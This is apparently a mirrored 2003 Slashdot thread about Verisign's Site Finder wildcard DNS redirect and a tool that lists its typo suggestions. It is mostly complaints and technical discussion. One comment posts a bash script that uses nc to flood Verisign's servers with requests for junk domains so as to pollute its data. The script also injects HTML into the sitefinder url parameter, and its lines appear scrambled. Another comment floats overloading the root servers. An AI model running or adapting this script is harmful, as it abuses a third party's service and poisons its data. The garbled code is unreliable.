Slashdot Mirror
Verisign Typosquatter Explorer
jelyon quotes Seth Finkelstein's website "I have written a program " Verisign Typosquatter Explorer" in order to examine [the Verisign] suggestions [for mistyped domains]. Future data may be analyzed as interest permits.
Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice."
it's amazing anybody is able to accomplish anything.
Anybody else feel like you just want to start over, with only good people involved, and remake the internet? None of this patent crap, none of this copyright bullshit, just pure standards that are actual standards. Uncompromised and pure. No restrictions on data, short of the physical line speeds.
Yeah yeah, I know..."when you wish, upon a star"
Mod me down with all of your hatred and your journey towards the dark side will be complete!
But does it matter? What Verisign is doing is wrong. Exactly how they're wrong is irrelevant.
"I don't believe it's an advertising rotation..."
It's a feature!
Two fish swim into a wall, one turns to the other and says, "Dam".
Everyone goto http://verisignneedstogetaclue.com
Don't forget to sign the petition on Verisign's abuse of the DNS system.
by Seth Finkelstein
Introduction
On Monday September 15 2003, a change to
When a URL has a misspelled domain name, Verisign's changes have the effect of redirecting every single HTTP page request (technically, HTTP response code 302). There is a redirection header and page which displays:
The document has moved here.
So, for example, the URL
http://verisign-is-to.net/more/evil/than/satan/
Gets redirected to:
http://sitefinder.verisign.com/lpc?url=verisign
This site suggests corrections to the typo. I have written a program " Verisign Typosquatter Explorer" in order to examine these suggestions. Future data may be analyzed as interest permits.
Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice.
Support
This project was not supported by anyone. If anyone is providing financial support for such projects, the author would dearly like to know.
Version 1.2 September 17 2003
See also: Domain Investigations
Mail comments to: Seth Finkelstein
For future information: subscribe to Seth Finkelstein's Infothought list or read the Infothought blog
See more of Seth Finkelstein 's Anticensorware Investigations
I mailed this little lot earlier today:
authenticode-support@verisign.com, billing@verisign.com, channel-partners@verisign.com, clientpki@verisign.com, consultingsolutions@verisign.com, dbms-support@verisign.com, dcpolicy@verisign.com, digitalbranding@verisign.com, dnssales@verisign.com, enterprise-pkisupport@verisign.com, enterprise-sslsupport@verisign.com, info@verisign-grs.com, internetsales@verisign.com, IR@verisign.com, jobs@verisign.com, mss@verisign.com, objectsigning-support@verisign.com, paymentsales@verisign.com, practices@verisign.com, premiersupport@networksolutions.com, press@verisign.com, privacy@networksolutions.com, renewal@verisign.com, support@verisign.com, verisales@verisign.com, vps-support@verisign.com, vts-csrgroup@verisign.com, vts-mktginfo@verisign.com, webhelp@verisign.com, websitesales@verisign.com, websitesupport@verisign.com
And I got a bunch of replies back, including *gasp* two written by actual human beings!
Remember folks, if you're going to write and complain, try and keep it civil. The porr bugger who hsa to read your complaint isn't the same person who actually took the decision to introduce sitefinder!
A little planning goes a long way...
So what do you do when you WANT to get a "domain cannot be found" error for troubleshooting purposes... I know it sounds weird, but this whole thing is very annoying.
R-
Hard loop..... huh?
Dynamic Designs
If I make a type for "slashdot" such as salhsdtot.com it suggests goatse.cx as a top candidate. That's some pretty smart AI VeriSign has.
Trolling is a art,
I cannot get to 64.94.110.11.
Either it is not responding, or our network is blocking it.
Here is a mirror of the site in case it goes down: http://www.madcowworld.com/sethf.com/domains/veris quat/
Hey, I'm outraged and mad too, like all of you.. but, I'm not seeing this. Maybe my ISPs have taken a stand with their DNS, but both my work and home ISPs? Unlikely. Why aren't I seeing this?
# Erik
I'll be back, motherfuckers.
I bet Michael Sims was DDOSing me.
I'm not Seth Finkelstein. I still speak the truth.
How is this any different from me buying mispelled domains to profit off other company's trademarks? I know the Federal Government just tossed a guy in jail for doing the same thing. There is something that stinks to high heaven about this. It looks like they are abusing their right to manage the USA TLDs along with violating RFCs.
Strange women lying in ponds distributing swords is no basis for a system of government.
If a large number of /.ers were to run a short script that tried to resolve random nonexistent domains, how long would it be before the root servers crashed?
/.ing the root servers.
Don't forget, YOU would not have done anything but asked your ISP's DNS for info. IT will be the one
Not that I suggest you do this.
The latest Slashdot meme.
What is news worthy about this? This doesn't provide any statistics by itself. There is no wrapper scripts to actually match anything. All this does is parse the response page to display suggested hits. It's not even written that well.
It prints the suggested URLs out and then what? This isn't an explorer, it's a shitty data dump.
Besides, I thought Michael hated Seth. How did this story get posted?
Dacels Jewelers can't be trusted.
Petitions are pathetic per se, but e-mail/web petitions carry absolutely no weight at all.
I've worked for professional politicians. The web/e-mail opinion is irrelevant. If you want to be counted (not heard, mind you) send a letter or a fax.
BOO! TERRO
What sort of monetary damages is this action by Verisign incurring for people and businesses everywhere?
Verisign's action was most probably intended for web traffic, where it's at least an annoyance. But since the DNS is an independent system from the web that's used by all sorts of services, it's undoubtedly breaking all sorts of non-web things out there that rely on knowing accurately if a domain name exists... not to mention all of the additional maintenance time. Email and spam filters are the two that seem to've been brought up a lot.
So far I've seen a lot of people getting mad and I am too, but I haven't seen anyone actually state how much they're losing due to the sudden change and breaking of standards by Verisign. Is anyone confident to put an amount on this?
404 errors are generated by webservers. your browser would return a this page could not be found/resolved page before this was changed.
This is news? Good god. I wish we could mod whole stories down... ;-(
-- I am. Therefore, I think!
Seriously, would it be possible for ISP's to file a class action suit? I have spent ALL day (so far) dealing with the repurcussions of this blatant misuse of authority. I know others out there are dealing with the same. I also had two customers get .ws websites rather than AVAILABLE .com sites because they use the method of putting the name in the browser and seeing if a site comes up. They figured verisign was squatting on the domain, and thought they would have to pay verisign for the use of the domain.
On a side note...
Our mail servers are filling up with spam, and with the recent loss of SPEWS, our spam filtering system is basically useless.. save for the few other blacklist sites still out there. Spammers must be rejoicing today.
Fuck you VeriSign, Fuck you very much.
Everyone is entitled to their own opinion. It's just that yours is stupid.
Well, this is finally working for me now!
Man, did you check out their "terms of service"? That shit is hilarious!
" 14. By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference."
HOW THE FUCK AM I SUPPOSED TO READ AND AGREE TO BE BOUND TO TERMS, when I arrived at the site by mis-typing a domain name????
From the privacy policy:
"Under no circumstances do we collect any personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, health, or sex life."
No? What about when I go to any political site, sex site, health site, religious site, etc, and don't type the domain name correctly?
http://www.sitefinderreallyreallysucks.com/
Because sitefinder-idn.verisign.com runs Linux, and now 99.99999999% of all domains now point to it, almost 100% of the Internet is now running Linux!
Verisign was contracted to run DNS servers for the .com and .net top-level domains; both of which are in practice "flat" address spaces, with no formalised lower-level hierarchy. If an organisation registers the domain "foo.com", implements nameservers for this domain, and then these nameservers ignore accepted practice and the way the majority of Internet applications expect the nameservice to work - then the organisation shoots only itself in the foot.
Verisign is in effect treating the entire top-level .com and .net domains as its corporate property.
If Verisign were genuinely ignorant of the effects of their move, then the company is not competent to operate TLD DNS services. If Verisgn were aware of the potential problems their decision could cause and went ahead regardless for commercial reasons then the company is not fit to operate TLD DNS services.
If ICANN cannot react to this nonsense in less than a working week, ICANN itself is not fit to direct the Internet naming service.
Apart from massed armies of geeks with pitchforks and flaming torches converging on Verisign and ICANN locations, does anyone have any constructive suggestions on how to get the parasites out of the loop?
If you think their servers are going to suffer under a slashdotting if they are now accepting ALL mistyped/obsolete domain names, think again. The slashdot traffic will be totally insignificant.
Does anyone have any idea how an application (or even resolver) writer could workaround this?
All the solutions I've come up with can be defeated by having verisign rotate their IP addresses or domain (sitefinder.verisign.com)
What is BIND doing?
Martin Brooks / Slayer99 #linux / UIN 2178117
It seems to work maybe 1 in 5 times. They pretty clearly did some serious underestimation of the server resources they's need to pull off this kind of thing, so now they are effectively DOS'ing Web clients by holding them up while their server chikes.
Incorrect. Domain change propagation still takes up to 48 hours, even when it's Verisign doing it.
.com/net/org subdomains, period. Whether you're in Canada or Antarctica, it doesn't matter. Some ISPs will have the new wildcard record, some will not. Give it a day or two, and everyone's caches will have expired and will have the latest info. Then you'll get to see it.
This change is on the root servers. They serve the
Random and weird software I've written.
I wrote an email today to NetSol/VeriSign to voice my displeasure. As I have 5 or so domains up for renewal in October, along with various web and email hosting features that go along with them that are currently with NetSol. I told them that I would be moving everything to another registrar should they not have rescinded their change by my renewal date.
I know that my $300 a year may not be the end of the world to them, but I thought it important that they know that some people will make buying decisions based on this. And the types of people that handle DNS registration issues are just the types of people to be ticked off by this.
They sent me a form letter response, that addressed both this new unregistered DNS feature as well as the "register in advance for about-to-expire domains" feature that I didn't mention at all in my email. Their response to that issue was also defensive, so I take it that they're getting an earful on that one as well.
-Lucas
-Lucas
Marketing fools don't read web server logs.
You have never actually worked at a company have you? You do realize that people make millions of dollars a year writing web server log analyzers and correlators for marketing research. Don't take my word for it though.
Single quotes are your friend. Anyone who types \& is a dumbass.
Really, how do you propose to pass a reference to a subroutine? Oh, you mean in shell syntax? Why do single quotes when you can just escape. Escaping is a pretty handy thing.
You're a dumbass.
You need some help, mate. Seriously. Get a cat or something.
Dacels Jewelers can't be trusted.
Official response is here
Essentially, they state that this change violates the RFC for DNS for several reasons. They are creating an IETF working group to recommended practices for implementing DNS, above and beyond what the RFC requires. Unfortunately, there is no mention of any action, or even censure.
Here
Somewhat off-topic, but relevant to the whole Verisign DNS idiocy... I have thrown up a database of patched nameservers here (don't worry about arouse.net, it's not a porn site), which currently allows you to check to see if a nameserver has been patched to block return of 'A' results for non-existent domains, and allows you to add to the database if it is a patched server.
OK, how about this one:
3 25 0
http://slashdot.org/article.pl?sid=03/09/16/192
It was only yesterday -- the Senate voted to roll back the FCC media consolidation ruling, based to some extent on the MoveOn petition. Check out the picture of Trent Lott standing next to 360,000 pieces of paper. One of those is mine, and it looks like it carried some weight to me.
I went to school with Eli Pariser, btw -- he's one of the guys who runs MoveOn. Check out what else they've done to see how online activism can be effective.
Spam filters could filter out "forged" email by verifying if the from address' domain actually resolved. Every address now resolves. Programs which check weither or not a web address is "up and working" can now be fooled into thinking it is up when it is not. There are hundreds of similar programs or software running in organizations that expect clear and consistant error information.
This bypasses my choice of search engine withing my browser for non existant domains (currently google).
Dude, that don't fix the apps, which is the main problem that the dumb cunts at VerShit didn't think about. Now all my programs can't figure out that the entered address is not at ip 216.168.224.63 or 64.94.110.11. So instead it tries those Ip's and has to time out. Hopefully their servers are getting flooded the fuck out but I guess one really needs to write a proper app to cause any serious damage that may get them to change their minds.
GPLv2: I want my rights, I want my phone call! DRM: What use is a phone call, if you are unable to speak?
#!/bin/bash
/${fakedom} HTTP/1.1
/lpc?url='%3E%3Cfont%20size=+5%20color=%23FF0000%3 E\
#
#Replace dumbwordlist if you like with nonsense
#that will be used to fill up Verisign's database
#with useless crap.
#To make it eviler, remove the $((RANDOM%10)) parts,
#or maybe wrap the inner loops with an outer loop that
#picks a random postfix and asks for all of the
#domains ending, with that prefix, 10 times or so.
#Since the stuff should get asked for repeatedly,
#maybe they'll get "false positives".
#
#Also note that this simulates the first request to
#the siteverifier page, which sends a redirect to the
#real page with the ads and links on it. We ignore it
#and send the second request, knowing full well what
#the first one looked like. Hopefully this "seems"
#legitimate on their end.
#
#Your ISP may have already null-routed 64.94.110.11;
#if so this script will hang with no output.
#To remedy, remove the first nc command (up to the first
# %%EOF%%). Leave the second one, as it appears
#that one is still visible. If both are invisible, your
#ISP has _really_ gone the distance to piss of Verisign
#
#Kudos!
dumbwordlist="rem0te br4nd sar1n flau7a mickst3r robbi3 ch3my jjopppl fuckkksl ncmaster df753 klopuier beeiosla cuntwh4ccker openinsertcl oofignet phaconspal qrrtioe sumnsan rx30sony popopospospposp llqksjajjq0 aslashji aklhjk3421 halff liveees ttooowo toowoo aslllkoq"
for each in $dumbwordlist;
do
for eachi in $dumbwordlist;
do fakedom=$each$((RANDOM%10))$eachi$((RANDOM%10));
nc 64.94.110.11 80 <<%%EOF%%
GET
Host: ${fakedom}.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
nc 12.158.80.10 80 <<%%EOF%%
GET
VERISIGN%20SUCKS%20MY%20${fakedom}%3C/font%3E HTTP/1.1
Host: sitefinder.verisign.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
done
done
Fuck Beta. Fuck Dice
And it depends on the content as well as the medium. My fax was original, business-like, and carefully-argued, though partly based on stuff available online. I suspect that originality, literacy, clarity, conciseness, and focus all count well, just as obvious copying, rambling, pointless emotion, length, and lack of focus will make a communication less likely to be read or acted upon. You need to state carefully but briefly the problem, the cause, what you're asking your representative to do, and why; if you do that politely, it'd be an inconsiderate person who didn't at least reply, whatever the medium.
I suspect that the reason online petitions often don't seem to count is less that they're online, and more that they're petitions; without a direct, personal request for action, any communication will have less weight.
Ceterum censeo subscriptionem esse delendam.
Except that, if a domain name has no MX, the A record is used instead.
Quoteth chapter & verse (RFC 2821, section 5):
"If no MX records are found, but an A RR is found, the A RR is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host."
So, any mail to a non-existant domain will be (attempted to) be delivered to 64.94.110.10, which helpfully has "Snubby Mail Rejector Daemon" running on port 25.
Check it out...
BIND delegation-only patch:
From the verisign-grs.com WHOIS:
Administrative Contract:
VERISIGN GLOBAL REGISTRY SERVICES rcc@verisign.com
21345 Ridgetop Circle
Dulles, VA 20166
US
703-742-0400 fax: 703-421-6703
Dunno how correct it is...god forbid that Verisign should put incorrect info in the whois database.